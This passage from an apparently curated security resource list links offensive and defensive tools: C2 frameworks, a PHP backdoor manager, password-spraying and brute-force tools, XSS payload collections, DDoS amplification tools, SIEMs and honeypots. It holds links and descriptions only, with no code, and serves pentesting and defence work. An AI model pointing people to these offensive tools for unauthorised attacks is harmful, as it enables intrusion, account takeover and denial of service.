• Starkiller - Frontend for Powershell Empire. It is an Electron application written in VueJS: https://github.com/BC-SECURITY/Starkiller
• One-Lin3r - consists of various one-liners that aids in penetration testing operations: https://github.com/D4Vinci/One-Lin3r
• mad-metasploit - Metasploit custom modules, plugins, resource script: https://github.com/hahwul/mad-metasploit
• EasySploit - Metasploit automation: https://github.com/KALILINUXTRICKSYT/easysploit
• pwndrop - self-deployable file hosting service for sending out red teaming payloads or securely sharing your private files over HTTP and WebDAV: https://github.com/kgretzky/pwndrop
• - a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers: https://github.com/cobbr/Covenant
• SnitchDNS - s a database driven DNS Server with a Web UI, written in Python and Twisted, that makes DNS administration easier with all configuration changed applied instantly without restarting any system services: https://github.com/ctxis/SnitchDNS
• prelude Operator - the first intelligent and autonomous platform built to attack, defend and train your critical assets through continuous red teaming: https://github.com/preludeorg | https://www.prelude.org/platform/operator | https://www.youtube.com/channel/UCZyx-PDZ_k7Vuzyqr4-qK9A
• ARTi-C2 - is a modern execution framework built to empower security teams to scale attack scenario execution from single and multi-breach point targets with the intent to produce actionable attack intelligence that improves the effectiveness security products and incident response: https://github.com/blackbotinc/Atomic-Red-Team-Intelligence-C2
• PowerSharpPack - many usefull offensive CSharp Projects wraped into Powershell for easy usage: https://github.com/S3cur3Th1sSh1t/PowerSharpPack
• zuthaka - a collaborative free open-source Command & Control integration framework that allows developers to concentrate on the core function and goal of their C2: https://github.com/pucarasec/zuthaka
• bantam - an advanced PHP backdoor management tool, with a lightweight server footprint, multi-threaded communication, and an advanced payload generation and obfuscation tool: https://github.com/gellin/bantam

Hunting Guides / Forensics / MISC

• Hunt for C&C channels using bro and rita: https://www.blackhillsinfosec.com/how-to-hunt-command-and-control-channels-using-bro-ids-and-rita/
• sqrrl hunting email headers: https://sqrrl.com/hunting-email-headers/?utm_source=hs_email&utm_medium=email&utm_content=57387063&_hsenc=p2ANqtz-_PrKGdn4tPttGcvrdPzUazcpHci98ldPOXBJPNG3MssLSS9Ch1xwHq7p6Kq-5NiUlLnTBBasLoM1WT8zUdpLEnKGeFAA&_hsmi=57386424
• Ultimate AppLocker Bypass List: https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/README.md
• List of binaries and scripts that can be used for other purposes than they are designed to: https://github.com/api0cradle/LOLBAS
• Endgame Malware BEnchmark for Research (ember): https://github.com/endgameinc/ember
• snake - malware storage, centralised and unified storage solution for malicious samples: https://github.com/countercept/snake
• rastrea2r - multi-platform open source tool that allows incident responders and SOC analysts to triage suspect systems and hunt for Indicators of Compromise (IOCs): https://github.com/rastrea2r/rastrea2r
• operative-framework-HD - digital investigation framework, you can interact with websites, email address, company, people, ip address,etc :https://github.com/graniet/operative-framework-HD
• THRecon - Collect endpoint information for use in incident response triage / threat hunting / live forensics: https://github.com/TonyPhipps/THRecon
• Active Directory Kill Chain Attack & Defense: https://github.com/infosecn1nja/AD-Attack-Defense
• Free Blocklists of Suspected Malicious IPs and URLs: https://zeltser.com/malicious-ip-blocklists/
• Endgame event query language(EQL): https://github.com/endgameinc/eql/blob/master/README.md
• Awesome YARA - curated list of awesome YARA rules, tools, and resources: https://github.com/InQuest/awesome-yara/blob/master/README.md
• DeepBlueCLI - PowerShell Module for Threat Hunting via Windows Event Logs: https://github.com/sans-blue-team/DeepBlueCLI
• JA3 - a method for creating SSL/TLS client fingerprints that should be easy to produce on any platform and can be easily shared for threat intelligence: https://github.com/salesforce/ja3/blob/master/README.md
• zBang - is a special risk assessment tool that detects potential privileged account threats in the scanned network: https://github.com/cyberark/zBang/blob/master/README.md
• Pentesting with certutil: https://www.hackingarticles.in/windows-for-pentester-certutil/
• Tool-X - is a Kali Linux hacking tools installer for Termux and linux system: https://github.com/Rajkumrdusad/Tool-X
• jpcertcc - This site summarizes the results of examining logs recorded in Windows upon execution of the 49 tools which are likely to be used by the attacker that has infiltrated a network: https://jpcertcc.github.io/ToolAnalysisResultSheet/#
• Slingshot C2 Matrix Edition - made in collaboration with SANS, Ryan O'Grady, and C2 Matrix contributors. The goal is to lower the learning curve of installing each C2 framework and getting you straight to testing which C2s work against your organization: https://howto.thec2matrix.com/slingshot-c2-matrix-edition
• uncoder.io - online translator for SIEM saved searches, filters, queries, API requests, correlation and Sigma rules to help SOC Analysts, Threat Hunters and SIEM Engineers: https://uncoder.io/
• F-secure - Attack Detection Fundamentals: https://labs.f-secure.com/blog/attack-detection-fundamentals-initial-access-lab-1/
• PwnDoc - a pentest reporting application making it simple and easy to write your findings and generate a customizable Docx report: https://github.com/pwndoc/pwndoc
• ThreatPursuit-VM - MANDIANT THREAT INTELLIGENCE VM: https://github.com/fireeye/ThreatPursuit-VM
• KQL Internals: https://identityandsecuritydotcom.files.wordpress.com/2020/08/kql_internals_hk.pdf
• jarm - an active Transport Layer Security (TLS) server fingerprinting tool(by CRM): https://github.com/salesforce/jarm
• BruteShark - a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files): https://github.com/odedshimon/BruteShark
• Name-that-hash - will name that hash type: https://github.com/HashPals/Name-That-Hash
• Windows & Active Directory Exploitation Cheat Sheet and Command Reference: https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/
• nzyme - a free and open WiFi defense system that detects and physically locates threats using an easy to build and deploy sensor system: https://www.nzyme.org/
• Certified Pre-Owned - Abusing Active Directory Certificate Services: https://posts.specterops.io/certified-pre-owned-d95910965cd2
• pimpmykali - a shell script that fixes bunch a bugs on a Kali Linux virtual machines https://github.com/Dewalt-arch/pimpmykali
• RedEye - n open-source analytic tool developed by CISA and DOE’s Pacific Northwest National Laboratory to assist Red Teams with visualizing and reporting command and control activities: https://github.com/cisagov/RedEye/

</span>

Blue Teams - Honeypots / IDS / Traps/ CTR

• honeybits - spread breadcrumbs & honeytokens: https://github.com/0x4D31/honeybits
• DTAG(T-Pot creators) https://github.com/dtag-dev-sec
• rockNSM(IDS) installation notes from SANS: https://isc.sans.edu/diary/rss/22832
• Security Onion 2 - free and open source Linux distribution for threat hunting, enterprise security monitoring, and log management. It includes TheHive, Playbook and Sigma, Fleet and osquery, CyberChef, Elasticsearch, Logstash, Kibana, Suricata, Zeek, Wazuh, and many other security tools: https://securityonionsolutions.com/software/ | https://docs.securityonion.net/en/2.3/about.html
• unfetter: https://github.com/unfetter-analytic/unfetter
• portspoof: https://github.com/drk1wi/portspoof
• GeoLogonalyzer - a utility to perform location and metadata lookups on source IP addresses of remote access logs: https://github.com/fireeye/GeoLogonalyzer
• Dejavu - open source deception framework which can be used to deploys deploy multiple interactive decoys: https://github.com/bhdresh/Dejavu
• - detects capabilities in executable files. You run it against a PE file or shellcode and it tells you what it thinks the program can do
• gravwell-community-edition: https://www.gravwell.io/blog/gravwell-community-edition
• logz.io: https://logz.io/
• SIEMonster: https://siemonster.com/
• Dsiem - Dsiem is a security event correlation engine for ELK stack, allowing the platform to be used as a dedicated and full-featured SIEM system: https://github.com/defenxor/dsiem
• siembol - provides a scalable, advanced security analytics framework based on open-source big data technologies. Siembol normalizes, enriches, and alerts on data from various sources, which allows security teams to respond to attacks before they become incidents: https://github.com/G-Research/siembol
• CyberSponse - community edtion: https://cybersponse.com/community-edition/
• Dflabs - community edition: https://www.dflabs.com/incman-soar-community-edition/
• - A scalable, open source and free Security Incident Response Platform, tightly integrated with MISP: https://thehive-project.org/
• Sigma - generic and open signature format that allows you to describe relevant log events in a straight forward manner: https://github.com/Neo23x0/sigma | https://github.com/socprime/SigmaUI
• MozDef - The Mozilla Enterprise Defense Platform (MozDef) seeks to automate the security incident handling process and facilitate the real-time activities of incident handlers: https://github.com/mozilla/MozDef
• - Unified platform for all levels of Cyber Threat Intelligence: https://www.opencti.io/en/
• - enterprise-ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance: https://wazuh.com/
• spidertrap - Trap web crawlers and spiders in an infinite set of dynamically generated webpage: https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/Spidertrap.md
• ElastAlert - a simple framework for alerting on anomalies, spikes, or other patterns of interest from data in Elasticsearch: https://github.com/Yelp/elastalert
• glastof - is a Python web application honeypot founded by Lukas Rist:https://github.com/mushorg/glastopf
• compot - is a low interactive server side Industrial Control Systems honeypot designed to be easy to deploy, modify and extend: http://conpot.org/
• jimi - an automation first no-code platform designed and developed originally for Security Orchestration and Response: https://github.com/z1pti3/jimi
• Malcolm - an easily deployable network analysis tool suite for full packet capture artifacts (PCAP files) and Zeek logs: https://github.com/idaholab/Malcolm/blob/master/README.md
• HoneyDB - provides real time data of honeypot activity. This data comes from honeypot sensors deployed globally on the Internet: https://honeydb.io/
• - malware analysis platform: https://github.com/saferwall/saferwall
• - a docker based, modularized toolchain for continuous security scans of your software project: https://github.com/secureCodeBox/secureCodeBox
• NERVE - Network Exploitation, Reconnaissance & Vulnerability Engine: https://github.com/PaytmLabs/nerve
• CHAPS - is a PowerShell script for checking system security settings where additional software and assessment tools, such as Microsoft Policy Analyzer, cannot be installed: https://github.com/cutaway-security/chaps
• Brim - open source desktop application for security and network specialists. Brim makes it easy to search and analyze data from packet captures like those created by Wireshark and structured logs, especially from the Zeek network analysis framework: https://github.com/brimsec/brim
• - A FLEXIBLE OPEN SOURCE UEBA PLATFORM USED FOR SECURITY ANALYTICS: http://openuba.org/
• Intel Owl - OSINT solution to get threat intelligence data about a specific file, an IP or a domain from a single API at scale: https://github.com/intelowlproject/IntelOwl
• Intrigue Core - open attack surface enumeration engine. It integrates and orchestrates a wide variety of security data sources, distilling them into a normalized object model: https://core.intrigue.io/
• Awesome CobaltStrike Defence: https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence
• Crossfeed - a tool that continuously enumerates and monitors an organization's public-facing attack surface in order to discover assets and flag potential security flaws: https://github.com/cisagov/crossfeed
• Awesome Incident Response - https://github.com/meirwah/awesome-incident-response
• dradis-ce - an open-source collaboration framework, tailored to InfoSec teams: https://github.com/dradis/dradis-ce
• APTRS (Automated Penetration Testing Reporting System) - The tool allows Penetration testers to create a report directly without using the Traditional Docx file. It also provides an approach to keeping track of the projects and vulnerabilities: https://github.com/Anof-cyber/APTRS
• osquery-defense-kit- production-ready detection & response queries for osquery: https://github.com/chainguard-dev/osquery-defense-kit
• sandboxprofiler - collect information of internet-connected sandboxes, no backend needed. This is achieved using telegram and interact.sh to collect data, however custom listeners are also supported: https://gitlab.com/brn1337/sandboxprofiler

        </span>
        </p3>
        </ul><br>

Web Security

• Automatic API Attack Tool - Imperva's customizable API attack tool takes an API specification as an input, and generates and runs attacks that are based on it as an output: https://github.com/imperva/automatic-api-attack-tool
• Taipan - an automated web application vulnerability scanner that allows to identify web vulnerabilities in an automatic fashion: https://github.com/enkomio/Taipan/blob/master/README.md
• fuzz-lightyear - pytest-inspired, DAST framework, capable of identifying vulnerabilities in a distributed, micro-service ecosystem through stateful Swagger fuzzing: https://github.com/Yelp/fuzz-lightyear/blob/master/README.md
• GoSpider - gast web spider written in Go: https://github.com/jaeles-project/gospider
• XSS-Freak - XSS scanner fully written in python3. It crawls the website for all possible links and directories to expand its attack scope. Then it searches them for input tags and then launches a bunch of XSS payloads: https://github.com/hacker900123/XSS-Freak
• vulnx - Intelligent Bot Auto Shell Injector that detects vulnerabilities in multiple types of Cms: https://github.com/anouarbensaad/vulnx
• Astra - REST API penetration testing tool: https://github.com/flipkart-incubator/Astra
• finalrecon - fast and simple python script for web reconnaissance: https://github.com/thewhiteh4t/finalrecon
• Payloads - A collection of web attack payloads: https://github.com/foospidy/payloads
• AuthMatrix - an extension to Burp Suite that provides a simple way to test authorization in web applications and web services: https://github.com/SecurityInnovation/AuthMatrix
• - shhgit finds secrets and sensitive files across GitHub (including Gists), GitLab and BitBucket committed in near real time: https://github.com/eth0izzle/shhgit
• - One tool to do all scans. Sken packages and manages open source scanners across all scan types, adds a SaaS orchestration layer and automates them in CI/CD: https://www.sken.ai/
• Hack-Tools - the all-in-one Red Team browser extension for Web Pentesters: https://github.com/LasCC/Hack-Tools
• - A simple, fast, recursive content discovery tool written in Rust
• Jaeles - a powerful, flexible and easily extensible framework written in Go for building your own Web Application Scanner: https://github.com/jaeles-project/jaeles
• tamper.dev - an extension that allows you to edit HTTP/HTTPS requests and responses as they happen without the need of a proxy: https://tamper.dev/
• proxify - Swiss Army Knife Proxy for rapid deployments. Supports multiple operations such as request/response dump, filtering and manipulation via DSL language, upstream HTTP/Socks5 proxy: https://github.com/projectdiscovery/proxify
• XSSTRON - Powerful Chromium Browser to find XSS Vulnerabilites automatically while browsing web: https://github.com/RenwaX23/XSSTRON
• AutoRepeater - Automated HTTP Request Repeating With Burp Suite: https://github.com/nccgroup/AutoRepeater
• xsshunter - allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service: https://xsshunter.com/
• vajra - utomated web hacking framework to automate boring recon tasks and same scans for multiple target during web applications penetration testing. Vajra has highly customizable target scope based scan feature: https://github.com/r3curs1v3-pr0xy/vajra
• MindAPI - a mindmap which combines years of experience in testing API security: https://github.com/dsopas/MindAPI
• gotestwaf - Go project to test different web application firewalls (WAF) for detection logic and bypasses: https://github.com/wallarm/gotestwaf
• kiterunner - API and content discovery at lightning fast speeds, bruteforcing routes/endpoints in modern applications: https://github.com/assetnote/kiterunner
• Epiphany - a pre-engagement \ self-assessment tool to identify weak spots of a web property from a DDoS attacker perspective: https://github.com/Cyberlands-io/epiphany
• jwtXploiter - a tool to test security of JSON Web Tokens. Test a JWT against all known CVEs: https://github.com/DontPanicO/jwtXploiter
• rengine - An automated reconnaissance framework for web applications with focus on highly configurable streamlined recon process via Engines, recon data correlation and organization, continuous monitoring, backed by database and simple yet intuitive User Interfac: https://github.com/yogeshojha/rengine
• graphw00f - inspired by wafw00f is the GraphQL fingerprinting tool for GQL endpoints, it sends a mix of benign and malformed queries to determine the GraphQL engine running behind the scenes. graphw00f will provide insights into what security defences each technology provides out of the box, and whether they are on or off by default: https://github.com/dolevf/graphw00f
• changeme - ocuses on detecting default and backdoor credentials and not necessarily common credentials. It's default mode is to scan HTTP default credentials, but has support for other credentials: https://github.com/ztgrace/changeme
• dalfox - an powerful open source XSS scanning tool and parameter analyzer and utility that fast the process of detecting and verify XSS flaws: https://github.com/hahwul/dalfox
• hakoriginfinder - Tool for discovering the origin host behind a reverse proxy. Useful for bypassing WAFs and other reverse proxies: https://github.com/hakluke/hakoriginfinder
• JavaScript obfuscator - a powerful free obfuscator for JavaScript, containing a variety of features which provide protection for your source code: https://github.com/javascript-obfuscator/javascript-obfuscator
• caido - a lightweight web security auditing toolkit. Built from the ground up in Rust, Caido aims to help security professionals and enthusiasts audit web applications with efficiency and ease: https://caido.io/
• metlo - Create an Inventory of all your API Endpoints. Proactively test your APIs before they go into production. Detect API attacks in real time: https://github.com/metlo-labs/metlo
• dastardly - a lightweight web application security scanner for your CI/CD pipeline: https://portswigger.net/burp/dastardly
• burp-awesome-tls - this extension hijacks Burp's HTTP/TLS stack and allows you to spoof any browser fingerprint in order to make it more powerful and less prone to fingerprinting by all kinds of WAFs: https://github.com/sleeyax/burp-awesome-tls
• IPRotate_Burp_Extension - extension for Burp Suite which uses AWS API Gateway to change your IP on every request: https://github.com/RhinoSecurityLabs/IPRotate_Burp_Extension
• FireProx - FireProx leverages the AWS API Gateway to create pass-through proxies that rotate the source IP address with every request: https://github.com/ustayready/fireprox
• gigaproxy - a tool is designed to rotate IPs using mitmproxy, AWS API Gateway, and Lambda: https://github.com/Sprocket-Security/gigaproxy
• sign-saboteur - a Burp Suite extension for editing, signing, verifying, and attacking signed tokens. It supports different types of tokens: https://github.com/d0ge/sign-saboteur
• gotestwaf - a tool for API and OWASP attack simulation that supports a wide range of API protocols including REST, GraphQL, gRPC, WebSockets, SOAP, XMLRPC, and others: https://github.com/wallarm/gotestwaf
• ShadowClone - allows you to distribute your long running tasks dynamically across thousands of serverless functions and gives you the results within seconds where it would have taken hours to complete: https://github.com/fyoorer/ShadowClone
• jwt-hack - Hack the JWT(JSON Web Token): https://github.com/hahwul/jwt-hack
• GAP-Burp-Extension - an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing: https://github.com/xnl-h4ck3r/GAP-Burp-Extension
• domloggerpp - a browser extension that allows you to monitor, intercept, and debug JavaScript sinks based on customizable configurations: https://github.com/kevin-mizu/domloggerpp
• GAP-Burp-Extension - this is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing: https://github.com/xnl-h4ck3r/GAP-Burp-Extension
• http-garden - a collection of HTTP servers and proxies configured to be composable, along with scripts to interact with them in a way that makes finding vulnerabilities much much easier: https://github.com/narfindustries/http-garden
• sj (Swagger Jacker) - a command line tool designed to assist with auditing of exposed Swagger/OpenAPI definition files by checking the associated API endpoints for weak authentication. It also provides command templates for manual vulnerability testing: https://github.com/BishopFox/sj
• GraphQLer - a cutting-edge tool designed to dynamically test GraphQL APIs with a focus on awareness. It offers a range of sophisticated features that streamline the testing process and ensure robust analysis of GraphQL APIs such as being able to automatically read a schema and run tests against an API using the schema: https://github.com/omar2535/GraphQLer
• DalFox - is a powerful open-source tool that focuses on automation, making it ideal for quickly scanning for XSS flaws and analyzing parameters. Its advanced testing engine and niche features are designed to streamline the process of detecting and verifying vulnerabilities: https://github.com/hahwul/dalfox

XSS Resources
• HTML5: http://html5sec.org/
• OWASP: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
• Reddit: https://www.reddit.com/r/xss/
• Js payloads, great tutorials: http://www.xss-payloads.com/index.html
• Powerfull web tool for creating event based payloads: http://brutelogic.com.br/webgun/
• Ultimate XSS protection Cheatsheet: https://xenotix.in/The%20Ultimate%20XSS%20Protection%20Cheat%20Sheet%20for%20Developers.pdf
• HTML5 attack Vectors: https://dl.packetstormsecurity.net/papers/attack/HTML5AttackVectors_RafayBaloch_UPDATED.pdf
• XSS Vulnerability Payload List: https://github.com/ismailtasdelen/xss-payload-list
• portswigger XSS cheat-sgeet: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet



Cloud Security

• serverless-prey - a collection of serverless functions (FaaS), that, once launched to a cloud environment and invoked, establish a TCP reverse shell, enabling the user to introspect the underlying container: https://github.com/pumasecurity/serverless-prey
• Deepfence Runtime Threat Mapper - is a subset of the Deepfence cloud native workload protection platform, released as a community edition: https://github.com/deepfence/ThreatMapper/blob/master/README.md
• Dow Jones Hammer - a multi-account cloud security tool for AWS. It identifies misconfigurations and insecure data exposures within most popular AWS resources, across all regions and accounts: https://github.com/dowjones/hammer/blob/master/README.md
• - a cloud security project with two main scanning modules- AzureStealth | AWStealth: https://github.com/cyberark/SkyArk
• Prowler - AWS Security Toola command line tool for AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool: https://github.com/toniblyx/prowler
• cloudsploit (Aqua) - an open-source project designed to allow detection of security risks in cloud infrastructure accounts: https://github.com/aquasecurity/cloudsploit
• deepfence SecretScanner - helps users scan their container images or local directories on hosts and outputs JSON file with details of all the secrets found: https://github.com/deepfence/SecretScanner
• OpenCSPM - an open-source platform for gaining deeper insight into your cloud configuration and metadata to help understand and reduce risk over time: https://github.com/OpenCSPM/opencspm
• endgame - An AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account - or share the resources with the entire Internet: https://endgame.readthedocs.io/en/latest/
• rpCheckup - an AWS resource policy security checkup tool that identifies public, external account access, intra-org account access, and private resources. It makes it easy to reason about resource visibility across all the accounts in your org: https://github.com/goldfiglabs/rpCheckup
• prawler - is a command line tool for AWS Security Best Practices Assessment, Auditing, Hardening and Forensics Readiness Tool: https://github.com/toniblyx/prowler
• cloudmapper - helps you analyze your Amazon Web Services (AWS) environments. The original purpose was to generate network diagrams and display them in your browser. It now contains much more functionality, including auditing for security issues: https://github.com/duo-labs/cloudmapper
• netz - discover an internet-wide misconfiguration of network components like web-servers/databases/cache-services and more: https://github.com/SpectralOps/netz
• red-shadow - scan your AWS IAM Configuration for shadow admins in AWS IAM based on misconfigured deny policies not affecting users in groups discovered by Lightspin's Security Research Team: https://github.com/lightspin-tech/red-shadow
• Principal Mapper - script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization: https://github.com/nccgroup/PMapper | https://research.nccgroup.com/2021/03/29/tool-release-principal-mapper-v1-1-0-update/
• Patrolaroid - an instant camera for capturing cloud workload risks. It’s a prod-friendly scanner that makes finding security issues in AWS instances and buckets less annoying and disruptive for software engineers and cloud admins: https://github.com/rpetrich/patrolaroid



office365 / AAD Security

• - a framework to interact with Azure AD. It currently consists of a library (roadlib) and the ROADrecon Azure AD exploration tool: https://github.com/dirkjanm/ROADtools
• o365recon - script to retrieve information via O365 with a valid cred: https://github.com/nyxgeek/o365recon
• MailSniper - a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain: https://github.com/dafthack/MailSniper
• o365creeper - is a simple Python script used to validate email accounts that belong to Office 365 tenants: https://github.com/LMGsec/o365creeper
• Sparrow.ps1 - created by CISA's Cloud Forensics team to help detect possible compromised accounts and applications in the Azure/m365 environment: https://github.com/cisagov/Sparrow
• CrowdStrike Reporting Tool for Azure (CRT): https://github.com/CrowdStrike/CRT
• MSOLSpray - A password spraying tool for Microsoft Online accounts (Azure/O365): https://github.com/dafthack/MSOLSpray
• AADInternals - PowerShell module contains tools for administering and hacking Azure AD and Office 365: https://o365blog.com/aadinternals/ | https://github.com/Gerenios/AADInternals
• Stormspotter - creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work: https://github.com/Azure/Stormspotter
• m365_groups_enum - Enumerate Microsoft 365 Groups in a tenant with their metadata: https://github.com/cnotin/m365_groups_enum
• Microsoft Azure & O365 CLI Tool Cheatsheet: https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md
• BruteLoops - a dead simple library providing the foundational logic for efficient password brute force attacks against authentication interfaceshttps://github.com/arch4ngel/BruteLoops
• MicroBurst - a PowerShell Toolkit for Attacking Azure that includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping. It is intended to be used during penetration tests where Azure is in use: https://github.com/NetSPI/MicroBurst
• PowerZure - a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform: https://github.com/hausec/PowerZure
• Azure-Red-Team - collection of AAD recon and attack resorces: https://github.com/rootsecdev/Azure-Red-Team
• AzureAD_Autologon_Brute - Brute force attack tool for Azure AD Autologon: https://github.com/nyxgeek/AzureAD_Autologon_Brute
• MicroBurst - includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping: https://github.com/NetSPI/MicroBurst
• Go365 - a tool designed to perform user enumeration* and password guessing attacks on organizations that use Office365 (now/soon Microsoft365). Go365 uses a unique SOAP API endpoint on login.microsoftonline.com that most other tools do not use: https://github.com/optiv/Go365
• BlueHound - a tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your networkhttps://github.com/zeronetworks/BlueHound | https://zeronetworks.com/blog/bluehound-community-driven-resilience/
• GraphSpy - THE SWISS ARMY KNIFE FOR ATTACKING M365 & ENTRA: https://github.com/RedByte1337/GraphSpy
• Graphpython - a modular Python tool for cross-platform Microsoft Graph API enumeration and exploitation: https://github.com/mlcsec/Graphpython



Online Tools

• Online packet Analyzer - http://packettotal.com/
• CyberChef: https://gchq.github.io/CyberChef/
• Docker Image Analyzer: https://anchore.io/
• URL Scanner / Sandbox: https://urlscan.io/
• Steve Gibson Shields UP / UPNP Exposure Test: https://www.grc.com/x/ne.dll?rh1dkyd2
• Phish IA: https://app.phish.ai/#/scan_url
• Mozilla Observatory: https://observatory.mozilla.org/
• Qualys SSL Labs Server Test: https://www.ssllabs.com/ssltest/
• Qualys SSL Labs Browser Test: https://www.ssllabs.com/ssltest/viewMyClient.html
• Explain Shell Commands: https://explainshell.com/
• HTML/CSS/JS interactive Cheatsheet: http://htmlcheatsheet.com/
• JSfiddle: https://jsfiddle.net/
• Code validator (Yaml, JSON, JS, etc): https://codebeautify.org/yaml-validator
• social IDE: https://codepen.io/
• json path finder: https://jsonpath.com/
• json query language: https://jmespath.org/
• repl.it - online Python compiler: https://repl.it/
• codepen - a social development environment for front-end designers and developers. Build and deploy a website, show off your work, build test cases to learn and debug, and find inspiration: https://codepen.io/
• render - Build, deploy, and scale your apps with unparalleled ease – from your first user to your billionth: https://render.com/
• dillinger - live markdown editor https://dillinger.io/
• glitch - the friendly community where everyone codes together: https://glitch.com/
• JS lint: https://jshint.com/
• JSON schema data generator: https://json-schema-faker.js.org/
• Search for open source repositories on github, gitlab, and bitbucket: https://www.bithublab.org/
• Python Regex tester: https://pythex.org/
• dnstwister - domain name permutation engine: https://dnstwister.report/
• mozilla SSL Configuration Generator: https://ssl-config.mozilla.org/
• graphql-playground: https://github.com/graphql/graphql-playground

API Stuff
• Postman Cheatsheet: https://postman-quick-reference-guide.readthedocs.io/en/latest/index.html
• explore-with-postman: https://github.com/ambertests/explore-with-postman
• Great collection of examples: https://github.com/DannyDainton
• Test automation university: https://testautomationu.applitools.com/Automation
• Loops with Postman: https://thisendout.com/2017/02/22/loops-dynamic-variables-postman-pt2/
• All CheatSheets: http://overapi.com/
• Hosted REST API: https://reqres.in/
• httpbin - A simple HTTP Request & Response Service: http://httpbin.org/
• Fake REST API with JSON and POSTMAN: https://dev.to/tadea/fake-rest-api-with-json-and-postman-5gi8
• Petstore - a sample server Petstore server: https://petstore.swagger.io/
• Parabank REST API: http://parabank.parasoft.com/parabank/api-docs/index.html
• Use curl to interact with an API: https://www.redhat.com/sysadmin/use-curl-api
• Cherrybomb - a CLI tool that helps you avoid undefined user behavior by validating your API specifications: https://www.blstsecurity.com/
• hurl - a command line tool that runs HTTP requests defined in a simple plain text format: https://github.com/Orange-OpenSource/hurl
• hoppscotch - Open Source API Development Ecosystem: https://github.com/hoppscotch/hoppscotch
• httptoolkit - an open-source tool for debugging, testing and building with HTTP(S) on Windows, Linux & Mac: https://github.com/httptoolkit/httptoolkit
• schemathesis - a tool that levels-up your API testing by leveraging API specs as a blueprints for generating test cases. It focuses on testing for general properties — such as ensuring no input leads to server errors and all responses adhere to the API spec — rather than just checking specific input-output combinations: https://schemathesis.readthedocs.io/en/stable/index.html

Password Lists
• https://wiki.skullsecurity.org/index.php?title=Passwords
• Seclists - https://github.com/danielmiessler/SecLists

Stress Test / Web Traffic Simulation / Test Automation

• https://loader.io/
• https://a.blazemeter.com/app/sign-in
• https://artillery.io/
• NodeJS Test Cafe: https://devexpress.github.io/testcafe/
• Google puppeteer(headless chrome): https://github.com/GoogleChrome/puppeteer
• GoldenEye - HTTP DoS Test Tool: https://github.com/jseidl/GoldenEye
• Cisco TRex - open source, low cost, stateful and stateless traffic generator fuelled by DPDK: https://trex-tgn.cisco.com/
• UBoat - Botnet simulator: https://github.com/Souhardya/UBoat
• TestProject - free end-to-end test automation platform for web, mobile, and API testing that’s supported by the #1 test automation community: https://testproject.io/
• Karate - open-source tool to combine API test-automation, mocks, performance-testing and even UI automation into a single, unified framework: https://github.com/intuit/karate/blob/master/README.md
• Saddam - DDos amplification attack tool: https://github.com/OffensivePython/Saddam
• Tsunami - a more professional and efficient version of the network stress tester / denial of service tools known as LOIC: https://sourceforge.net/projects/tsunami-dos/
• dsnperf -free tool to gather accurate latency and throughput metrics for Domain Name Service (DNS): https://github.com/DNS-OARC/dnsperf
• rpounder - apache bench for DNS resolvers: https://github.com/mowings/rpounder
• dnsstresss - Simple Go program to stress test a DNS server: https://github.com/MickaelBergem/dnsstresss
• dnsprobe - a tool built on top of retryabledns that allows you to perform multiple dns queries of your choice with a list of user supplied resolvers: https://github.com/projectdiscovery/dnsprobe
• k6 - a modern load testing tool, building on Load Impact's years of experience in the load and performance testing industry: https://github.com/loadimpact/k6
• 🎭Playwright - a Node library to automate Chromium, Firefox and WebKit with a single API. Playwright is built to enable cross-browser web automation that is ever-green, capable, reliable and fast: https://github.com/microsoft/playwright
• httpie - a user-friendly command-line HTTP client for the API era: https://httpie.org/
• httptoolkit - gives you instant insight and access into every request & response, with zero hassle. Test clients, debug APIs and catch bugs, all at lightning speed: https://httptoolkit.tech/
• hurl - a command line tool that runs HTTP requests defined in a simple plain text format. It can perform requests, capture values and evaluate queries on headers and body response. Hurl is very versatile: it can be used for both fetching data and testing HTTP sessions: https://hurl.dev/
• PacketSender - utility to allow sending and receiving TCP, UDP, and SSL (encrypted TCP) packets: https://github.com/dannagle/PacketSender
• Ddosify - High-performance load testing tool: https://github.com/ddosify/ddosify
• vegeta - a versatile HTTP load testing tool built out of a need to drill HTTP services with a constant request rate. It can be used both as a command line utility and a library: https://github.com/tsenart/vegeta
• ddosify - high-performance load testing tool: https://github.com/ddosify/ddosify